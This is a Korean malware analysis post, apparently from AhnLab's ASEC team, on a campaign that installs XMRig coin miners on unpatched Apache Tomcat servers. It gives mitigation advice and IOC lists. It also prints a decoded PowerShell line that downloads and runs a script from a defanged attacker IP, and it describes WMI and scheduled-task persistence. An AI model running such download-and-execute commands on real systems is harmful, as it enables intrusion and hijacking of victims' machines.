취약한 아파치 톰캣 웹 서버를 대상으로 설치되는 코인 마이너 악성코드

ASEC 분석팀에서는 최근 취약한 아파치 톰캣 웹 서버를 대상으로 하는 공격을 확인하였다. 최신 업데이트가 되지 않은 톰캣 서버는 대표적인 취약점 공격 벡터 중 하나이다. 과거에도 ASEC 블로그에서 취약한 JBoss 버전이 설치된 아파치 톰캣 서버를 대상으로 한 공격을 소개한 바 있다. 공격자는 취약점 공격 도구인 JexBoss를 이용해 웹쉘을 설치한 후 미터프리터 악성코드로 감염 시스템에 대한 제어를 획득하였다.

일반적으로 공격자들은 스캐닝 결과 취약한 버전을 갖는 웹 서버가 확인되면 버전에 맞는 취약점을 이용해 웹쉘을 설치하거나 악성 명령을 실행한다. 참고로 IIS 윈도우 웹 서버에서는 w3wp.exe 프로세스에 의해 공격자의 명령이 실행되며 아파치 톰캣 웹 서버에서는 tomca7.exe, tomcat9.exe 같은 프로세스가 이를 담당한다. IIS 웹 서버에 대한 공격 사례는 과거 다음 ASEC 블로그에서 다룬 바 있다.

공격자가 사용한 구체적인 공격 방식은 확인되지 않지만 자사 ASD(AhnLab Smart Defense) 로그에 따르면 감염 시스템에서 파워쉘 명령이 실행된 것을 확인할 수 있다.

[그림 1] 톰캣 프로세스가 파워쉘 명령을 실행하는 ASD 로그 – 1

톰캣 프로세스에 의해 실행된 파워쉘 명령은 다음과 같이 Base64 인코딩되어 있으며, 복호화 할 경우 아래와 같이 파워쉘 명령을 다운로드해 실행하는 다운로더 명령임을 알 수 있다.

[그림 2] 톰캣 프로세스가 파워쉘 명령을 실행하는 ASD 로그 – 2

복호화된 파워쉘 명령

IEX (New-Object System.Net.Webclient).DownloadString(‘hxxp://61.103[.]177.229:8000/css/ta.txt’)

다운로드되어 실행되는 파워쉘 스크립트는 먼저 지속성을 유지를 위해 다음과 같이 현재 SYSTEM 권한을 보유하는지 여부에 따라 WMI 이벤트 모니터링 방식 또는 작업 스케줄러에 파워쉘 명령을 등록한다.

[그림 3] 지속성 유지를 위한 파워쉘 명령

파워쉘 명령은 모두 유사한데 각각 다음과 같은 Pastebin 주소에서 스크립트를 다운로드해 실행하는 것이 전부이다. 현재는 해당 주소에 정상적인 파워쉘 주소가 존재하지 않아 지속성 유지는 불가하지만 과거에는 아래에서 다룰 악성코드들과 유사하게 코인 마이너를 설치했을 것으로 추정된다.

  • – hxxps://pastebin[.]com/raw/3a9iMmp5
  • – hxxps://pastebin[.]com/raw/H4vnbNqe

이후에는 외부에서 XMRig 코인 마이너 및 설정 파일을 다운로드해 설치한다. 이외에도 특정 서비스 및 작업 스케줄러들을 종료하는 루틴이 존재하는데, 이는 다른 공격자들에 의해 설치되어 있을 수도 있는 코인 마이너 악성코드들로 추정된다.

[그림 4] 코인 마이너 악성코드 설치 루틴
[그림 5] config.json 설정 파일
  • Mining Pool 주소 : “pool.supportxmr[.]com:80”
  • User : “4AjC6NFWZvQNhPrHYDBbwhFzqjwEcwVzZLLfb4s66X4r1WTFePbX85B88sw6fFPK38QxLewd2c1W9UJzgoSe6v3o3WGtuVD”
  • Pass : “x”

참고로 코인 마이너 악성코드가 업로드된 주소 또한 국내 업체로 추정된다. 접속 시 다음과 같은 고객 지원 / 빌링 시스템의 로그인 페이지를 확인할 수 있는데 해당 시스템 또한 공격자에 의해 침해되어 악성코드가 업로드되었을 것으로 보인다.

[그림 6] 코인 마이너가 업로드된 감염 시스템

해당 주소에서 유포되는 악성코드들 중에는 RAR SFX 실행 파일도 존재하는데, 내부에 XMRig와 config.json을 가지고 있고 동일한 마이닝 풀 주소 및 공격자의 계정이 사용된 것으로 추정했을 때 과거 Pastebin에 업로드된 파워쉘 스크립트가 설치하는 악성코드로 추정된다.

[그림 7] RAR SFX 악성코드에 의해 생성되는 VBS 악성코드

관리자는 기본적으로 설정된 계정 정보를 변경해야 하며, 서버 구성 환경이 취약할 경우 최신 버전으로 패치해 기존에 알려진 취약점으로부터 사전에 방지해야 한다. 그리고 외부에 공개된 서버의 경우 보안 제품을 통해 외부인으로부터의 접근을 통제할 필요가 있다. 또한 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.

안랩 V3 제품에서는 해당 악성코드들에 대해 다음과 같이 진단하고 있다.

[파일 진단]
– Downloader/PowerShell.Generic (2022.10.19.03)
– Win-Trojan/Miner3.Exp (2020.01.23.00)
– CoinMiner/Script.Agent (2022.10.19.03)
– Dropper/Win.Miner.C5283988 (2022.10.19.03)
– Trojan/VBS.Runner.SC184041 (2022.10.19.03)

[행위 진단]
– Execution/MDP.Powershell.M2514

[IOC]
MD5

– 12799b5f179c7d84122a79fc2d4e2629 : PowerShell 스크립트
– 1925ba565905e6b0e6c2b2f55f9fee96 : XMRig 코인 마이너
– 606ce310d75ee688cbffaeae33ab4fee : XMRig 코인 마이너
– a969e99ce36946d7fbece73f874b4e7d : config.json
– 627d3815c9faf693d89cf1361706a856 : config.json
– 4346850f1794c621d06f08e58f530365 : 코인 마이너 드로퍼 악성코드
– 1650d7d352a8cd12bf598f71e9daf98b : VBS 악성코드

다운로드 주소
– hxxp://61.103.177[.]229:8000/css/ta.txt
– hxxp://61.103.177[.]229:8000/js/xmrig.exe
– hxxp://61.103.177[.]229:8000/css/config.json
– hxxps://pastebin[.]com/raw/H4vnbNqe
– hxxps://pastebin[.]com/raw/3a9iMmp5

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

0 0 votes
별점 주기
guest

0 댓글
Inline Feedbacks
View all comments